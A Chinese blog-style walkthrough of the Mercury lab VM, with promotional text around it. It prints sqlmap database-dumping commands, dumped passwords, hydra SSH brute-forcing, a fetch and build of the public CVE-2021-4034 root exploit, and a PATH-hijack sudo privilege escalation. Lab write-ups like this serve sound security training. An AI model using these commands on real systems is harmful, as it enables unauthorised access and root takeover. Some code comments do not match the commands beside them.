既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上软件测试知识点,真正体系化!
由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新
渗透机:kali IP :192.168.0.105 靶机IP :192.168.0.103
使用命令:
nmap -sS -sV -A -n -p- 192.168.0.103
开启了22
和8080
端口老样子先访问,说还在开发中直接扫后台dirsearch
扫到了一个robots.txt
进行访问,得到三个路径分别访问!
②:漏洞发现:
这里点进去我们可以发现存在1
可能存在SQL
注入漏洞 直接使用sqlmap
测一下 发现可以
sqlmap -u "http://192.168.0.103:8080/mercuryfacts/2" --dbs --batch #发现数据库
sqlmap -u "http://192.168.0.103:8080/mercuryfacts/2" -D mercury --tables --batch #爆破数据表
sqlmap -u "http://192.168.0.103:8080/mercuryfacts/2" -D mercury -T users --dump --batch #获取字段内容
这里得到了几组账号和密码分别进行尝试最后一个就是SSH
账号密码尝试登入,登入成功!!!
johnny1987 john
lovemykids111 laura
lovemybeer111 sam
mercuryisthesizeof0.056Earths webmaster
hydra -l webmaster -P user.txt ssh://192.168.0.103 #可以尝试九头蛇进行爆破
③:SSH登入:
SSH
私钥验证登入,获取第一个FLAG
接下来就是提取了。
在~
下面发现了一个notes.txt
文件查看有一串Base64
编码解码得:mercurymeandiameteris4880km
切换linuxmaster
用户 使用命令:find / -perm -4000 -type f 2>/dev/null
④:CVE-2021-4034漏洞提权:
git clone https://github.com/berdav/CVE-2021-4034 #如果下载不了就本机下,然后拖带kaili里面
mack #会生成一个/cve-2021-4034
./cve-2021-4034 #运行即是root权限
这里可麻烦了我搞了半天 先是本机git
访问不到github
然后下载kali
拖进去
因为靶机里面是没有unzip
得所以要将所有文件打包tar
才行 然后开启apache2
服务 使用wget
进行下载
为了更好得查看先建个目录不然解压出来很乱 然后执行make
进行编译 在运行/cve-2021-4034
即可。
PS:因为这个漏洞很吊 我本地kali运行也可以提权 当时搞错了本机找了半天flag文件没找到(原谅我得无知尴尬,哈哈哈)
⑤:获取FALG:
⑥:Sudo+SETENV(环境变量)提权(第二种提权方法):
没办法追求完美 所有要做一下第二种方法!
sudo -l
查看一下 可以执行root
权限得sudo
命令
原理:sudo
运行时默认会启用env_reset
选项将从命令行设置的环境变量复原,因此通常情况下,当使用sudo
命令时,通过本地修改环境变量也没法替换目标文件来进行提权,但如果sudo在配置时为用户设置了SETENV
选项情况就不一样了SETENV
会允许用户禁用env_reset
选项,允许sudo
使用当前用户命令行中设置的环境变量
echo "/bin/bash" > tail #从/bin目录复制一个vim,并命名为tail存在/tmp目录下
chmod 777 tail #给个权限
export PATH=.:$PATH #将/tmp目录放置在PATH环境变量的最前面
sudo --preserve-env=PATH /usr/bin/check_syslog.sh #伪造的tail命令,从而用vim进行提权
![img](https://img-blog.csdnimg.cn/img_convert/402c4525f90f2f8d3bcfcad9b67665b0.png)
![img](https://img-blog.csdnimg.cn/img_convert/68d00e01a9b2b0ee6013e801cf74bcb9.png)
**网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**
**[需要这份系统化的资料的朋友,可以戳这里获取](https://bbs.csdn.net/forums/4f45ff00ff254613a03fab5e56a57acb)**
**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**
s.csdn.net/forums/4f45ff00ff254613a03fab5e56a57acb)**
**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**